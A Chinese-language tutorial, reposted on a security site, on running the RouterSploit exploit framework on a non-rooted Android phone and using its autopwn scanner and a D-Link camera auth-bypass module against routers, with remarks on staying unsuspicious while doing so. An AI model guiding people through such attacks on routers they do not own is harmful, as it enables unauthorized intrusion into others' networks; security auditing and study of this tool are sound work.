Loading
0

手机没Root?你照样可以渗透路由器

和Metasploit差不多,RouterSploit是一个强大的漏洞利用框架,用于快速识别和利用路由器中的普通漏洞,它还有个亮点,就是可以在绝大多数安卓设备上运行。

如果你想在电脑上运行,可以阅读这篇文章,而这篇教程则会告诉你如何轻松地在未Root的安卓设备上安装RouterSploit,这样一来,只要你的智能手机可以连接这些有漏洞的路由器,你就可以渗透他们。

RouterSploit vs 路由器

路由器是我们联通世界的通道,它们管理着互联网通信,加密我们的流量,保护着我们的隐私,还将我们与内网的或者外网的其他设备连接起来。

很大一部分人认为这种设备如此出色是理所当然的,还认为只要一接入并提供互联网,安装工作就完成了,殊不知路由器本身就是个Linux系统的电脑,很多人在管理员账户的控制面板上留下了默认密码,有些根本没有登陆且安装更新过。

如果感觉像是在说你,那么你就应该去修改默认密码然后再看剩下的教程。

因为路由器容易被忽略,所以就经常有一些常见的漏洞可以被正确地程序利用。RouterSploit利用大多数常见漏洞和默认设置,能让你用任何支持Python脚本的设备快速评估和利用路由器。

安卓上的Debian Linux

为了能在安卓设备上运行,大多数工具需要root权限,而root权限并不是那么容易获取的,而且也不是特别安全。为了在我们的设备上运行RouterSploit,一个叫GNURootDebian的应用能代替我们在安卓设备上安装Debian系统,而Kali就是基于Debian的。

在安卓设备上运行RouterSploit

Kali确保了我们所需的大多数依赖都已经被安装,所以我们需要在安卓版本的Debian上安装很多依赖来确保工具的正常运行。这种方法不需要root权限或者其他千奇百怪的许可,而且还可以让我们在安卓手机上运行Linux下的Python工具。

在安卓设备上使用攻击框架

安卓环境可以允许用很多无线攻击技术来指导你的攻击和评估,在一个设备中,有很多应用能帮你探测,连接,以及攻击任何开放的接入点,这里列举一些我使用的应用。

如果用于在一个地区内无线网的探测和认证, Wigle Wifi Wardriving 能让你查看,记录,以及与周围的无线传输交互。

如果要扫描网络和认证信息,IP地址以及可用服务, Fing Network Scanner 可以扫描你连接的任何网络的所有东西,然后返回每个连接设备的细节信息。

一旦一个设备被你当作目标,RouterSploit的自动入侵扫描会显示当前目标上所有可用的入侵途径。

将未Root的安卓设备当作攻击平台

在安卓上使用强大的Linux框架,我们就多了一种方法,以直观的角度入侵。而且在被发现有人正在做不正常的事情的情况下,使用一个安卓手机会比使用特制的硬件更加不被人怀疑。

常言道工欲善其事,必先利其器,黑客工具也不例外,GNURootDebian有为入侵行为快速搭建平台的能力,而且能让任何人不用特制的工具就能审计路由器安全,时间不长,你就能学会如何在假装玩精灵宝可梦的时候取得路由器的控制权。

开始前必备

这个搭建方法的美妙之处在于你仅仅需要一台安卓设备,我用了三星Galaxy S8,因为到处拿着一个超大的曲面屏玻璃能提醒我人生是多么的脆弱,话说回来,你可以用任何支持GNURoot Debian的安卓设备。

第一步:安装GNURoot Debian

要开始,我们需要安装GNURoot Debian,前面已经提到,他能让那给我们在没有root的手机上上运行Debian Linux,在Google Play商店 ,搜索GNURoot Debian或者点击 这里 。

很棒的山羊胡子

下载这个应用(大概60MB,网速可能会有点慢),一旦应用被安装,接下来就是你第一次运行的时候了,在第一次打开时,你会看见Debian环境正在搭建,很多文本在快速地滚动。

等待几分钟,安装完成后你会看见下图所示画面。

一旦Debian Linux安装完成,接下来就是安装依赖的步骤了。

第二步:安装依赖

安卓上的Debian Linux不像Kali那样预安装了任何特定依赖,所以我们要从很多事情开始,尤其是Python,因为我们需要它来运行我们想要的模块。首先,我们需要更新。

apt-get update 

接下来执行以下命令:

apt-get install sudo
sudo apt-get install git-core

这两个命令会安装sudo和git,在这之后你就可以从Github上获得源码了,除此之外还需下面的命令。

sudo apt-get install python-dev python-pip libncurses5-dev git

第三步:安装RouterSploit

一旦依赖被安装,就可以执行下面的命令

git clone https://github.com/reverse-shell/routersploit

第四步:第一次运行RouterSploit

安装完成后,你一定想运行,看看是不是真的有用,此时你需要返回Home目录,执行下面的命令:

cd routersploit

然后像这样运行Python脚本:

sudo python ./rsf.py 

几秒钟的加载之后,就会成功运行了。(使用方法和metasploit差不多)

use(后接模块) set(后接变量) show options(显示模块选项) check(检查目标是否有漏洞可以利用)
run(对目标运行模块)

你可以运行autopwn,执行下方命令:

use scanners/autopwn

顾名思义,这个命令会运行autopwn来扫描目标。

第五步:设置与开始

你的手机上如果安装了前文提到的 Wigle Wifi Wardriving ,那么就很容易发现周围的无线网络,利用 Fing 就可以扫描无线网络,在此不再赘述。

一旦知道了目标的IP地址,你就可以把它放进autopwn里,输入下列命令查看选项

show options

这样一来我们就可以设定目标的IP地址了,具体命令如下所示:

set target [目标IP地址]

再次输入“show options”可以检查当前设定,但你对设定满意时,输入下方命令即可开始

run

第六步:利用找到的漏洞

当autopwn找到漏洞时,利用就十分简单了。此时你只需要复制可用的模块路径,然后粘贴在use后,就可以开始利用了。举个例子:

use exploits/cameras/dlink/dcs_9301_9321_auth_bypass

然后像之前一样设定IP地址

set target [目标IP地址]

之后再次输入“run”即可。

(PS:理论上说其他的很多工具也可以运行。)

【声明】:8090安全小组门户(https://www.8090-sec.com)登载此文出于传递更多信息之目的,并不代表本站赞同其观点和对其真实性负责,仅适于网络安全技术爱好者学习研究使用,学习中请遵循国家相关法律法规。如有问题请联系我们:邮箱hack@ddos.kim,我们会在最短的时间内进行处理。